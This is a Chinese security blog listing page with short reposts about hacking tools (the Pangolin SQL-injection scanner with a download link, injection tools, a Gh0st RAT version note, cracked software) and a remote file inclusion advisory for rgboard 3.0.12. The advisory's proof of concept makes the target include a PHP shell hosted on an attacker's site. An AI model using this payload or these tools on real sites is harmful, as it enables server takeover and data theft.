鬼仔's Blog

作者：zwell
来源：NOSEC
之前一直在德国出差，针对许多朋友提出的非常好的一些意见都没有时间进行一下版本更新。回国后立马做了两件事情，一件事情就是更新了网站，另一件事情就是更新了Pangolin，最新版本1.2.5.600，一些修改如下：

• 添加扫描配置参数Scan all params not only the last one，勾上的话使用者就可以测试所有的参数了。默认情况下只会针对最后一个参数进行。
• 现在使用ASPACK进行压缩了，这样就避免一些杀毒软件误报。
• 修正了暴力模式下一直提示内容为32的错误
• 修正了在获取信息时会保留上一次残留信息的不足
• ……还有许多其他的修正，一下列不完了，大家使用过后就知道了。

在这里更新一下下载地址：http://seclab.nosec.org/pangolin_bin.rar

ps：Gh0st更新到3.1了。

作者：CoolDiyer
来源：红狼

<style type=”text/css”>
input {font-family: “Verdana”;font-size: “11px”;BACKGROUND-COLOR: “#FFFFFF”;height: “18px”;border: “1px solid #666666”;}
body ,td{font-size: 11px; font-family: Verdana;}
</style>
阅读全文 »

作者：CoolDiyer
来源：红狼

wsi是注入工具，支持自定义数据包，可自定义提交数据包格式，程序自动替换“***”为注入的SQL语句，只支持Access
hwis.exe为扫描工具，扫描一个网站的注入点，深度扫描网站两层，可扫描get,post,cookie注入点
阅读全文 »

作者：CoolDiyer
来源：红狼

// xml.cpp : By CoolDiyer 2008/4/9 14:03 
//
#pragma comment(linker, "/subsystem:windows /FILEALIGN:0x200 /opt:nowin98")

#include <windows.h>
#include <atlbase.h>
#import "msxml.dll"
 阅读全文 »

作者：secowu
来源：完美者精品论坛

感谢:
1.在WZ,得到众多高人的帮助,实现了绿化,感谢GDCCAP，ZTS59,Simon,感谢CCTV
2.感谢quboboo提供3.2版本更新信息及破解文件
3.感谢其它任何提供帮助或者顶贴的人

更新:
1.更新至最新版本3.2
2.完美解决图标隐藏问题
3.其它更新记录不再描述
阅读全文 »

作者：lcx
来源：vbs小铺

‘CMD下的dir好像没法列出从某段时间到某段时间的文件，所以写了这个小东东

set Arg=Wscript.Arguments
If Arg.Count=0 then
阅读全文 »

鬼仔：我还没来得及测试。

作者：golds7n[LAG]
大小：9216 Bytes
MD5 ：7026217dc72aa564a2834995d7a7b017
来源：安全焦点

————————–
NtGod Private
Powered By golds7n[LAG]
————————–
Usage: NtGodMode.exe ON|OFF
阅读全文 »

鬼仔：昨天有事出去了下，家里宽带到期了，我竟然不知道，晚上回来之后才发现的，今天去交了费，所以更新没跟上。

Infos: rgboard 3.0.12 远程文件包含漏洞
Author: Flyh4t[w.s.t]

rgboard 3.0.12 是韩国的一个论坛程序,可以用google搜索rgboard查看使用的网站
vul code:
\include\bbs.lib.inc.php：
if (!defined(‘BBS_LIB_INC_INCLUDED’)) {
define(‘BBS_LIB_INC_INCLUDED’, 1);
// *– BBS_LIB_INC_INCLUDED START –*
if(!$site_path) $site_path=’./’;
require_once “{$site_path}include/lib.inc.php”;
//$site_path没有过滤直接放过来包含了
poc:
在你的网站放个phpshell,目录和文件名为/include/lib.inc.php
然后访问
httP://www.target.com/include/bbs.lib.inc.php?site_path=http://yousite/